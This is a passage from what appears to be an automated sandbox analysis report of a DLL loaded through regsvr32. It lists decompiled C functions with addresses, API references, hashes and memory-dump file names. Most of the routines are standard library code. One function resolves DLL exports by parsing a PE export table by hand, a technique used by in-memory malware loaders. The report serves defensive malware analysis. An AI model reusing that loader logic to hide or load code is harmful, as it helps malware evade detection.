				return E100167D5(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
			}

0x10013f9e
0x10013f9e
0x10013fa7
0x10013fae
0x10013fb2
0x10013fb5
0x10013fb8
0x10013fbc
0x10013fbe
0x10013fbe
0x10013fbe
0x10013fc5
0x00000000
0x00000000
0x10013fd3
0x10013fde
0x10013fe5
0x10013ff4
0x1001401d
0x1001401d
0x10014031

APIs

lstrlenA.KERNEL32(?,?,00000000), ref: 10013FC8
_memset.LIBCMT ref: 10013FE5
GetWindowTextA.USER32 ref: 10013FFF
lstrcmpA.KERNEL32(00000000,?), ref: 10014011
SetWindowTextA.USER32(?,?), ref: 1001401D

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction ID: fa7108181993de9b8ea87dd6eaa7291c2451852d429ff63cadea9d36e3b3e8b2
Opcode Fuzzy Hash: 2b79ff425e09df3a26b2ab50ef16ba7c17b80cb00167e4224560e412a4786cd9
Instruction Fuzzy Hash: 3901C0B6A00228ABE711DB65DCC4FDF77ACEF18790F110065EA45D7141DA70DE848BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010C0F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E10010C0F(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E1001431B(__ebx, _t25, __ebp, 0xc);
				_push(E100100DE);
				_t26 = E100139F5(__ebx, 0x1005a8e0, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E1000A0DB(_t21, 0x1005a8e0, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10014388(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000E725(_t21, 0x1005a8e0, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x10010c0f
0x10010c0f
0x10010c0f
0x10010c12
0x10010c17
0x10010c26
0x10010c28
0x10010c2a
0x10010c2c
0x10010c2c
0x10010c31
0x10010c35
0x10010c6f
0x10010c71
0x00000000
0x10010c37
0x10010c37
0x10010c3c
0x10010c44
0x10010c47
0x10010c53
0x10010c59
0x10010c5b
0x10010c5e
0x00000000
0x00000000
0x10010c63
0x10010c69
0x10010c69
0x00000000
0x10010c49

APIs

Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
Part of subcall function 1001431B: InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
Part of subcall function 1001431B: LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
Part of subcall function 1001431B: EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 100139F5: __EH_prolog3_catch.LIBCMT ref: 100139FC

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 10010C53
FreeLibrary.KERNEL32(?), ref: 10010C63

Strings

hhctrl.ocx, xrefs: 10010C37
HtmlHelpA, xrefs: 10010C4D

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction ID: 8873b40b3358b87e9332ca8c9146562190e137befea279647b799a71fcd87530
Opcode Fuzzy Hash: 70501895dbc1ad2a0e808d427635024ad07f3595ed01fbc2665ff07db8d8f757
Instruction Fuzzy Hash: 7001F431204303DFE321DFA1DE05B4A76E0EF05781F018A08F4DAA8061DBB1D8D0DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 100224E9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E100224E9() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1002bb98;
					_v28 =  *0x1002bb90;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x100224ee
0x100224f6
0x1002250d
0x100224b9
0x100224c2
0x100224ce
0x100224d1
0x100224d4
0x100224d6
0x100224d9
0x100224de
0x100224e8
0x100224e0
0x100224e4
0x100224e4
0x100224f8
0x100224fe
0x10022506
0x00000000
0x10022508
0x10022508
0x1002250c
0x1002250c
0x10022506

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1001A130), ref: 100224EE
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 100224FE

Strings

IsProcessorFeaturePresent, xrefs: 100224F8
KERNEL32, xrefs: 100224E9

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction ID: b1380c49f8d15cda8b98f9f56e3724ed638b8beb480886d8724856f67b077174
Opcode Fuzzy Hash: 3c78fa25cbee28e165ffdeda389deaa1f92564da871b159ff165506123a88fa1
Instruction Fuzzy Hash: EDF03030900D1EE2EF00ABE1BC596AF7A78FB44785FD20490E681B0088DF7181718681

Uniqueness

Uniqueness Score: -1.00%

Function 10002D50, Relevance: 6.4, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10002D50(intOrPtr __ecx, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				signed short* _v36;
				intOrPtr _v40;
				void* _t79;
				void* _t119;

				_v40 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v12 = 0;
				_v16 =  *_a4 + 0x78;
				if( *((intOrPtr*)(_v16 + 4)) != 0) {
					_v8 = _v20 +  *_v16;
					if( *((intOrPtr*)(_v8 + 0x18)) == 0 ||  *((intOrPtr*)(_v8 + 0x14)) == 0) {
						SetLastError(0x7f);
						return 0;
					} else {
						if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
							_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x20));
							_v36 = _v20 +  *((intOrPtr*)(_v8 + 0x24));
							_v24 = 0;
							_v28 = 0;
							while(_v28 <  *((intOrPtr*)(_v8 + 0x18))) {
								_t79 = E10001F70(_a8, _v20 +  *_v32);
								_t119 = _t119 + 8;
								if(_t79 != 0) {
									_v28 = _v28 + 1;
									_v32 = _v32 + 4;
									_v36 =  &(_v36[1]);
									continue;
								}
								_v12 =  *_v36 & 0x0000ffff;
								_v24 = 1;
								break;
							}
							if(_v24 != 0) {
								L17:
								if(_v12 <=  *((intOrPtr*)(_v8 + 0x14))) {
									return _v20 +  *((intOrPtr*)(_v20 +  *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
								}
								SetLastError(0x7f);
								return 0;
							}
							SetLastError(0x7f);
							return 0;
						}
						if((_a8 & 0xffff) >=  *((intOrPtr*)(_v8 + 0x10))) {
							_v12 = (_a8 & 0xffff) -  *((intOrPtr*)(_v8 + 0x10));
							goto L17;
						}
						SetLastError(0x7f);
						return 0;
					}
				}
				SetLastError(0x7f);
				return 0;
			}

0x10002d56
0x10002d5f
0x10002d62
0x10002d71
0x10002d7b
0x10002d94
0x10002d9e
0x10002dab
0x00000000
0x10002db8
0x10002dc3
0x10002e0b
0x10002e17
0x10002e1a
0x10002e21
0x10002e45
0x10002e5d
0x10002e62
0x10002e67
0x10002e30
0x10002e39
0x10002e42
0x00000000
0x10002e42
0x10002e6f
0x10002e72
0x00000000
0x10002e72
0x10002e81
0x10002e8f
0x10002e98
0x00000000
0x10002eb5
0x10002e9c
0x00000000
0x10002ea2
0x10002e85
0x00000000
0x10002e8b
0x10002dd7
0x10002dfa
0x00000000
0x10002dfa
0x10002ddb
0x00000000
0x10002de1
0x10002d9e
0x10002d7f
0x00000000

APIs

SetLastError.KERNEL32(0000007F), ref: 10002D7F
SetLastError.KERNEL32(0000007F), ref: 10002DAB

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction ID: 028074866867044f4bb64f701422ec5252acdb94d91fdee864382ef112f730bb
Opcode Fuzzy Hash: 4d3452531a7c5fa1c81c99bf09ef5018cf44bb84df21a50ba64e81c18ec72dd0
Instruction Fuzzy Hash: F7510570A4415AEFEF04CF94C880AAEB7F1FF48384F608569D855AB349D734EA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10023E83, Relevance: 6.1, APIs: 4, Instructions: 101
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10023E83(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E10016E2B( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E1001E243( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E10017D62(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x10023e8b
0x10023e92
0x10023ea7
0x00000000
0x10023e99
0x10023e9b
0x10023eb3
0x10023eb8
0x10023ebb
0x10023ebe
0x10023ee7
0x10023eec
0x10023ef0
0x10023f71
0x10023f83
0x10023f8c
0x10023f8e
0x10023ece
0x10023ece
0x10023ed1
0x10023ed3
0x10023ed6
0x10023ed6
0x10023ed6
0x10023ed6
0x00000000
0x10023edc
0x10023f50
0x10023f50
0x10023f55
0x10023f5b
0x10023f5e
0x10023f60
0x10023f63
0x10023f63
0x10023f63
0x10023f63
0x00000000
0x10023f67
0x10023ef2
0x10023ef5
0x10023ef5
0x10023efb
0x10023efe
0x10023f25
0x10023f28
0x10023f28
0x10023f2e
0x00000000
0x00000000
0x10023f30
0x10023f33
0x00000000
0x00000000
0x10023f35
0x10023f35
0x10023f38
0x10023f38
0x10023f3e
0x10023eac
0x10023eac
0x10023f47
0x00000000
0x10023f47
0x10023f00
0x10023f03
0x00000000
0x00000000
0x10023f07
0x10023f15
0x10023f18
0x10023f1e
0x10023f20
0x10023f23
0x00000000
0x00000000
0x00000000
0x10023f23
0x10023ec0
0x10023ec3
0x10023ec5
0x10023ecb
0x10023ecb
0x00000000
0x10023e9d
0x10023e9d
0x10023ea2
0x10023ea4
0x10023ea4
0x00000000
0x10023ea2
0x10023e9b

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10023EB3
__isleadbyte_l.LIBCMT ref: 10023EE7
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F18
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,10022C1D,?,?,00000002), ref: 10023F86

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction ID: bc0a73e0192d900c1d89498958e44598309ec6eeb61669affd2269eacaf1277d
Opcode Fuzzy Hash: 9fecb1cfdfc7269cf4ddeba3d560e390ad46f881d90bbc81769201c589544707
Instruction Fuzzy Hash: EA319931A0028AEFDF50DFA4E891AAE7BF9EF00251F92C5A9F4648B191D330E944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 100145B9, Relevance: 6.1, APIs: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E100145B9(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t39;
				void* _t47;
				intOrPtr* _t48;
				void* _t50;
				void* _t51;
				void* _t64;
				void* _t65;
				intOrPtr _t66;
				void* _t68;
				void* _t70;

				_t65 = __edi;
				_t64 = __edx;
				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
				_t29 =  *((intOrPtr*)(_t51 + 0x10));
				if(_t29 == 0) {
					L19:
					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
				}
				_t32 = _t29 - 1;
				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
				if(_t32 != 0) {
					goto L19;
				}
				if(_a4 == 0) {
					L8:
					_push(_t65);
					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
					_t70 = E100139DB(0x10058f44);
					if(_t70 == 0 || _t66 == 0) {
						L18:
						goto L19;
					} else {
						_t35 =  *((intOrPtr*)(_t70 + 0xc));
						_t80 = _t35;
						if(_t35 == 0) {
							L12:
							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
								_t36 =  *((intOrPtr*)(_t70 + 0xc));
								_a4 = _a4 & 0x00000000;
								_t83 = _t36;
								if(_t36 != 0) {
									_push(_t36);
									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
									_push( *((intOrPtr*)(_t70 + 0xc)));
									_a4 = _t39;
									E10016380(_t51, _t66, _t70, _t83);
								}
								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
								if(_t37 == 0 && _a4 != _t37) {
									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
								}
							}
							goto L18;
						}
						_push(_t35);
						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
							goto L18;
						}
						goto L12;
					}
				}
				if(_a4 != 0xffffffff) {
					_t47 = E1000B510();
					if(_t47 != 0) {
						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
						_t77 = _t48;
						if(_t48 != 0) {
							 *_t48(0, 0);
						}
					}
				}
				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
				goto L8;
			}

0x100145b9
0x100145b9
0x100145c3
0x100145c5
0x100145cc
0x100146a4
0x100146af
0x100146af
0x100145d2
0x100145d5
0x100145d8
0x00000000
0x00000000
0x100145e1
0x10014625
0x10014625
0x1001462b
0x10014638
0x1001463c
0x100146a3
0x00000000
0x10014642
0x10014642
0x10014645
0x10014647
0x10014658
0x1001465f
0x10014661
0x10014664
0x10014668
0x1001466a
0x1001466c
0x1001466d
0x10014672
0x10014675
0x10014678
0x1001467e
0x10014685
0x1001468d
0x10014690
0x100146a0
0x100146a0
0x10014690
0x00000000
0x1001465f
0x10014649
0x10014656
0x00000000
0x00000000
0x00000000
0x10014656
0x1001463c
0x100145e7
0x100145e9
0x100145f0
0x100145f2
0x100145f5
0x100145f7
0x100145fb
0x100145fb
0x100145f7
0x100145f0
0x10014600
0x10014608
0x10014610
0x10014618
0x10014620
0x00000000

APIs

__msize.LIBCMT ref: 1001464A
__msize.LIBCMT ref: 1001466D
_malloc.LIBCMT ref: 10014685
_malloc.LIBCMT ref: 1001469A

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10009D34, Relevance: 6.1, APIs: 4, Instructions: 58
windowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 87%

			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E10017BC1(E10027DA5, __ebx, __edi, __esi);
				_t35 = E10009B91(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E10009CDE(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E10017C83( &_a4, 0x1002e16c);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}

0x10009d34
0x10009d34
0x10009d34
0x10009d34
0x10009d34
0x10009d3b
0x10009d48
0x10009d4a
0x10009d4d
0x10009d51
0x10009d54
0x10009d56
0x10009d56
0x10009d5b
0x10009d5e
0x10009d62
0x10009d65
0x10009d71
0x10009d76
0x10009d78
0x10009d7a
0x10009d7d
0x10009d82
0x10009d84
0x10009d84
0x10009da2
0x10009db8
0x10009dc3
0x10009dcb
0x10009dcb
0x10009da4
0x10009da7
0x10009da9
0x10009da9
0x10009dce

APIs

__EH_prolog3.LIBCMT ref: 10009D3B

Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB

__CxxThrowException@8.LIBCMT ref: 10009D71
FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A

Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D

LocalFree.KERNEL32(?), ref: 10009DC3

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
String ID:
API String ID: 1615547351-0
Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51

Uniqueness

Uniqueness Score: -1.00%

Function 1000C887, Relevance: 6.1, APIs: 4, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E1000C887(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}

0x1000c88a
